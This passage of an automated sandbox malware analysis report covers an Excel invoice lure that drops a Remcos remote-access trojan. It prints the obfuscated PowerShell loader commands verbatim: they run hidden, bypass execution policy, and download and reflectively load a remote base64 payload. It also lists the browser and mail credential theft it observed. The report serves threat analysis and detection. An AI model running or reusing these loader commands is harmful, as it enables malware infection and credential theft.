                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/nodete'+'cton'+'/nodetect'+'on/refs'+'/heads/mai'+'n/'+'deta'+'hn'+'oth-v.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'co'+'n'+'tent = '+'(new'+'-'+'ob'+'ject s'+'y'+'s'+'tem.net.webcl'+'i'+'ent).d'+'o'+'wn'+'loadstrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryc'+'ontent'+' = ['+'sy'+'stem'+'.'+'c'+'onvert]::fr'+'o'+'m'+'b'+'ase64'+'strin'+'g({1}base64c'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[reflec'+'t'+'ion'+'.assem'+'bly]::load'+'({'+'1'+'}'+'b'+'inar'+'ycont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'io.home]::vai({0}tx'+'t.r'+'ess'+'sd'+'r/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}re'+'g'+'asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [char]34,[char]36,[char]39) | .( $shellid[1]+$shellid[13]+'x')"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnezf9dscrj3inkydsid0gjysnezj9jysnahr0cccrj3mnkyc6ly8nkydyyxcuzycrj2knkyd0ahunkydidxmnkydlcmnvjysnbnrlbicrj3qnkycujysnyycrj29tl05vrgv0zscrj2n0t24nkycvtm9ezxrly3qnkydpbi9yzwzzjysnl2hlywrzl21hascrj24vjysnrgv0yscrj2hojysnb3rolvyudccrj3gnkyd0ezinkyd9oyb7jysnmx1ijysnyscrj3nljysnnicrjzqnkyddbycrj24nkyd0zw50id0gjysnke5ldycrjy0nkydpyicrj2ply3qguycrj3knkydzjysndgvtlk5ldc5xzwjdbccrj2knkydlbnqplkqnkydvjysnd24nkydsb2fku3ryaw4nkydnkhsxfxvybcknkyc7ihsnkycxjysnfscrj2jpbicrj2fyeumnkydvbnrlbnqnkycgpsbbjysnu3knkydzdgvtjysnlicrj0mnkydvbnzlcnrdojpgcicrj28nkydtjysnqicrj2fzzty0jysnu3ryaw4nkydnkhsxfwjhc2u2nemnkydvbnqnkydlbnqpoycrjyankyd7mx1hc3nlbwjsesankyc9jysniccrj1tszwzszwmnkyd0jysnaw9ujysnlkfzc2vtjysnymx5xto6tg9hzccrjyh7jysnmscrj30nkydijysnaw5hcicrj3ldb250jysnzscrj24nkyd0jysnktsgwycrj2rubglijysnlicrj0lplkhvbwvdojpwqukoezb9dhgnkyd0llinkydfu1mnkydtrccrj1ivmdu0lzkundqumdqnkycyljgzjysnly86chr0jysnahsnkycwfscrjywnkycgezb9zgvzyxrpdmfkb3swfswgeycrjzb9zgvzjysnyxrpdmfkjysnb3swfswgeycrjzb9zgunkydzjysnyscrj3rpdicrj2fkb3swfswnkycgezb9umunkydnjysnqxntezb9lcankyd7mh17mh0nkycsezankyd9jysnezb9kscplwygiftjagfsxtm0lftjagfsxtm2lftjagfsxtm5ksb8ic4oicrtsevmtelkwzfdkyrtaevsbelkwzezxssnwccp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('{1}u'+'r'+'l = '+'{2}'+'http'+'s'+'://'+'raw.g'+'i'+'thu'+'bus'+'erco'+'nten'+'t'+'.'+'c'+'om/nodete'+'cton'+'/nodetect'+'on/refs'+'/heads/mai'+'n/'+'deta'+'hn'+'oth-v.t'+'x'+'t{2'+'}; {'+'1}b'+'a'+'se'+'6'+'4'+'co'+'n'+'tent = '+'(new'+'-'+'ob'+'ject s'+'y'+'s'+'tem.net.webcl'+'i'+'ent).d'+'o'+'wn'+'loadstrin'+'g({1}url)'+'; {'+'1'+'}'+'bin'+'aryc'+'ontent'+' = ['+'sy'+'stem'+'.'+'c'+'onvert]::fr'+'o'+'m'+'b'+'ase64'+'strin'+'g({1}base64c'+'ont'+'ent);'+' '+'{1}assembly '+'='+' '+'[reflec'+'t'+'ion'+'.assem'+'bly]::load'+'({'+'1'+'}'+'b'+'inar'+'ycont'+'e'+'n'+'t'+'); ['+'dnlib'+'.'+'io.home]::vai({0}tx'+'t.r'+'ess'+'sd'+'r/054/9.44.04'+'2.83'+'//:ptt'+'h{'+'0}'+','+' {0}desativado{0}, {'+'0}des'+'ativad'+'o{0}, {'+'0}de'+'s'+'a'+'tiv'+'ado{0},'+' {0}re'+'g'+'asm{0}, '+'{0}{0}'+',{0'+'}'+'{0})')-f [char]34,[char]36,[char]39) | .( $shellid[1]+$shellid[13]+'x')"Jump to behavior
                    Source: RegAsm.exe, 00000013.00000002.642581330.0000000000B91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager invoice_45009 [Compatibility Mode]b
                    Source: RegAsm.exe, 00000013.00000002.642581330.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, logs.dat.19.drBinary or memory string: [Program Manager]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00434CB6 cpuid 19_2_00434CB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,19_2_0045201B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,19_2_004520B6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_00452143
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,19_2_00452393
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,19_2_00448484
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_004524BC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,19_2_004525C3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_00452690
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,19_2_0044896D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,19_2_0040F90C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,19_2_00451D58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,19_2_00451FD0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_004489D7 GetSystemTimeAsFileTime,19_2_004489D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_0041B69E GetComputerNameExW,GetUserNameW,19_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 19_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,19_2_00449210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_0041739B GetVersionExW,20_2_0041739B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.642861861.000000000241E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642709056.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642581330.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642581330.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1436, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data19_2_0040BA4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\19_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db19_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccountJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULLJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULLJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULLJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword21_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword21_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword21_2_00402DB3
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2032, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0BYJUEJump to behavior
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.3ac0b60.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000013.00000002.642861861.000000000241E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642709056.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642581330.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642234277.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.642581330.0000000000B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003439000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.487113772.0000000003659000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2880, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1436, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe19_2_0040569A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information121
                    Scripting
                    Valid Accounts11
                    Native API
                    121
                    Scripting
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    13
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts43
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    21
                    Obfuscated Files or Information
                    211
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    21
                    Encrypted Channel
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts122
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    2
                    Credentials in Registry
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares2
                    Email Collection
                    1
                    Remote Access Software
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    Login Hook1
                    Windows Service
                    1
                    Bypass User Account Control
                    3
                    Credentials In Files
                    4
                    File and Directory Discovery
                    Distributed Component Object Model211
                    Input Capture
                    2
                    Non-Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell
                    Network Logon Script422
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets38
                    System Information Discovery
                    SSH3
                    Clipboard Data
                    213
                    Application Layer Protocol
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                    Virtualization/Sandbox Evasion
                    Cached Domain Credentials3
                    Security Software Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Access Token Manipulation
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                    Process Injection
                    Proc Filesystem4
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                    Remote System Discovery
                    Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528050 Sample: invoice_45009.xls Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 64 m2g.me 2->64 90 Suricata IDS alerts for network traffic 2->90 92 Found malware configuration 2->92 94 Malicious sample detected (through community Yara rule) 2->94 96 21 other signatures 2->96 11 EXCEL.EXE 59 35 2->11         started        signatures3 process4 dnsIp5 68 m2g.me 14.194.50.211, 443, 49163, 49165 TTSLMEIS-AS-APTTSL-ISPDIVISIONIN India 11->68 70 38.240.44.9, 49164, 49171, 49172 COGENT-174US United States 11->70 56 C:\Users\user\...\invoice_45009.xls (copy), Composite 11->56 dropped 15 wscript.exe 1 11->15         started        18 WINWORD.EXE 348 31 11->18         started        file6 process7 dnsIp8 120 Suspicious powershell command line found 15->120 122 Wscript starts Powershell (via cmd or directly) 15->122 124 Bypasses PowerShell execution policy 15->124 132 2 other signatures 15->132 22 powershell.exe 4 15->22         started        66 m2g.me 18->66 48 C:\Users\user\AppData\Roaming\...\m2g.me.url, MS 18->48 dropped 50 C:\Users\user\AppData\Roaming\...\d1a1.url, MS 18->50 dropped 52 ~WRF{93BF753C-FD01...B-F8FB75D6D297}.tmp, Composite 18->52 dropped 126 Microsoft Office launches external ms-search protocol handler (WebDAV) 18->126 128 Office viewer loads remote template 18->128 130 